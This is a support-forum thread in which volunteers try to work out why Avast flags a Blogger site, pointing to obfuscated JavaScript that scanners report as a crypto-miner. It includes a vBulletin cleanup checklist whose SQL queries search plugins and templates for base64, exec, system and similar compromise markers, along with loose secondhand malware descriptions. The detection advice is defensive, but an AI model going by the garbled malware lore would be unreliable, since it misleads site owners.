Avast Says that My website is infected

Hello,
I have a blog post at wxw.egyptsonline.com and I’ve got Avast alert saying that it aborted connection on wxw.egyptsonline.com because it was infected with JS:Downloader-FJP [Trj].

I’ve Checked my blog many times but it’s okay.

Please help.

Thanks in advance

You can report a suspected FP (File/Website) here: https://www.avast.com/false-positive-file-form.php

HTML scan
https://www.virustotal.com/gui/file/01ec324eafe441ee12ac0ef54d96e79e5df5963983316d0949f1c35c999056b7/detection

Wait for a final verdict from an avast team member, as we here are just volunteers with relevant knowledge,
but cannot come and unblock, only avast team members can.

Probably script from line 1751-1765, heavily obfuscated javascript code, is being flagged here.
See: https://aw-snap.info/file-viewer/?protocol=secure&ref_sel=GSP2&ua_sel=ff&chk-cache=&fs=1&tgt=d3d3LntneXB0c11ubFtuey5eXW1g~enc ,which is found to be crypto-miner-.script

Not flagged: https://zulu.zscaler.com/submission/3f0b3168-89ee-44c9-8a4f-d9e1c246ec3f

Quttera’s flags website as suspicious, but the original scan was clean.
Detected crypto miner - 23 suspicious files → https://quttera.com/detailed_report/www.egyptsonline.com
Exactly the obfuscated code I mentioned earlier from line 1751-1765
Detected is encoded JavaScript code, commonly used to hide suspicious behaviour,
crypto-miner…

Cleanse that miner script off of your website,

polonus (volunteer 3rd party cold reconnaissance website security analyst and website error-hunter)

Hello,

Thank you very much for your responding.
I tried to remove many things but I still get the same alert, as well as avast prevent me to access your forum too.

Note: I bought my website template as it is without any changes, I don`t know why that happens now.

best regard

You don’t say why avast alerts on your site (a screenshot of the alert might help) ?

It might also have something to do with your Web Host and why more information is required.

If you haven’t done so already the direct form of contact (reporting this) is the link in Reply #1, then you need to do that.

Hello,

Thank you very much for your responding

Actually, my blog on google, and I have contacted them, they said that:

Here is the text:

HI
Can you check with Avast to see why they report that?
https://sitecheck.sucuri.net/results/https/www.egyptsonline.com shows no issue and Chrome /Google do not block it.

EDIT
And you did clear the cache etc?

And you are using the httpSwww version url?

About the link in Reply #1

I`ve submitted a request 2 times without any results

I attached a screenshot of the alert

VirusTotal does not flag that actual site, but has various detections for that particular IP.

Anyway as I said, wait for a final verdict from an avast team member,
they may come up after the week-end with an answer.

polonus

@ romanynazmy4
Your attached image would suggest that you have a javascript element somewhere on the site.

Response from that link wouldn’t be immediate and you may not get a direct response, but that link is monitored by the virus labs team. There may be a delay given it is a weekend.

As mentioned, we would have to wait for input from avast.

Well the 7 detections that VT produces here: https://www.virustotal.com/gui/file/01ec324eafe441ee12ac0ef54d96e79e5df5963983316d0949f1c35c999056b7/detection
(thanks, Pondus, for posting these results earlier) are still actual, and haven’t changed.

AegisLab detects Trojan.HTML.Generic.4!c Antiy-AVL detects Trojan[Clicker]/JS.Pvgtr.dldr Avast detects JS:Downloader-GNM [Trj] AVG detects JS:Downloader-GNM [Trj] Ikarus detects Trojan.JS Qihoo-360 detects Script/Trojan.Downloader.8ea Zoner detects Trojan.HTML.Adobe.78454
As I see it not much room for a false positive then or 7 av solutions are wrong.

A more recent html scan now has 5 detecting it: https://www.virustotal.com/gui/file/5e2afaa6f1c75210c9dc1652ce3690ab642a5b7ecdc4f7db9d2028749ba725f8/detection

This malware has been with us since 2003 and since has seen new variants appear:

As soon as Trojan.Downloader.JS.Agent enters your computer system, it creates a file named %System%.exe, %temp%wininet.dll and then it starts to make changes to Windows Register, by changes and additions to the register.

So what is the nature of the obfuscated JavaScript code here?

Related malcode:

XMRig Miner Trojan
LokiBot Trojaan
CoinHive Miner Trojan
Trojan.Generic

polonus

Hello Pondus

Thank you for your responding.

Actually, I bought the template as it is, about 2 years ago without any changes.
why that happen now?

Note: I contacted technical support (forum) of blogger , the said that the problem with you.

please, tell my the way to solve the issue…
Tell me steps, I am not a programmer…
Thanks again

Let someone do that cleansing for you. Read about it here for a likewise malware infection:

https://forum.vbulletin.com/forum/vbulletin-3-8/vbulletin-3-8-questions-problems-and-troubleshooting/414123-how-to-get-rid-of-this-malware

To check a site for compromises follow these steps: (likewise routine, here meant for vbulletin)
  1. Run Suspect File Diagnostics under Maintenance → Diagnostics. Replace any files not containing the expected contents. Delete any files that are not part of vBulletin and that you can’t identify as belonging to your addons.

  2. Check the config.php for any suspicious code. It isn’t checked by the suspect file diagnostic.

  3. Search all templates for iframe tags. They should only appear in the following templates: bbcode_video, editor-ie.css, member.css, stylegenerator.css, vbcms.css, vbulletin.css, help_bbcodes, humanverify_recaptcha, search_common, and search_common_select_type

  4. Check all your plugins for rogue include, require, include_once, or require_once code. All files should come from your server and be known to you. See step #7

  5. Check your plugins for any base64 code. I recommend using against using any plugins or products that include base64 code in them. However some “lite” or branded addons will include this as a means to prevent you from cheating the author. You’ll have to make a personal call on these if you use them. This is often a sign of a hacked site.

  6. Make sure that your plugins do not include calls to exec(), system(), or pass_thru() or iframes. These are also often signs of a hacked site.

The following query can be run in phpMyAdmin and will provide results for steps 5 and 6 -
SELECT title, phpcode, hookname, product FROM plugin WHERE phpcode LIKE ‘%base64%’ OR phpcode LIKE ‘%exec%’ OR phpcode LIKE ‘%system%’ OR phpcode like ‘%pass_thru%’ OR phpcode like ‘%iframe%’;

If you a plugin that you can’t read or the code is obfuscated then you should probably contact the addon author. If it is assigned to the vBulletin, vBulletin CMS, vBulletin Blog or Skimlink products, delete it.

  1. Using PHPMyAdmin run this query: SELECT styleid, title, template FROM template WHERE template LIKE ‘%base64%’ OR template LIKE ‘%exec%’ OR template LIKE ‘%system%’ OR template like ‘%pass_thru%’ OR template like ‘%iframe%’;

It checks the templates for compromising code. You will need to review the results from this. If you can’t read it or the code is obfuscated then you should revert the template in the Admin CP.

  1. Check .htaccess to make sure there are no redirects there.

  2. Check all plugins in reference to cache or cookies. If they are similar to any of the above, delete them.

Info credits go to vbulletin support’s Trevor Hannant.

polonus

Hello Pondus,

Thanks for the your answer.

I don`t have these tools, I have a blog post on google.

Please, tell me why that happens now though I bought the template 2 years ago without any changes?

Thank you very much for your efforts.

Hello Pondus,
Hello ..... note that P o n d u s and P o l o n u s is not the same guy ;)

Quttera say it detect crypto miner https://quttera.com/detailed_report/egyptsonline.com

Hi romanynazmy4,

For support go here: https://support.google.com/blogger/community

For security implications it is also good to see this following scan report:

https://webcookies.org/cookies/www.egyptsonline.com/27979411?801691

Main issue mentioned there: “The page loads 11 third-party JavaScript files and 11 CSS but does not employ Sub-Resource Integrity to prevent breach if a third-party CDN is compromised”.

Suspicious pattern detected twice. Also confirmed with the Quttera scan result.

No Pondus and polonus are different persons, but Pondus has been found many times to cooperate closely with polonus.

polonus is a third party cold reconnaissance scanner here in the Virus & Worms
while Pondus has a very fundamental knowledge of VirusTotal scan lore, which is often very helpful.

greetings from the surroundings of Rotterdam, Holland,

polonus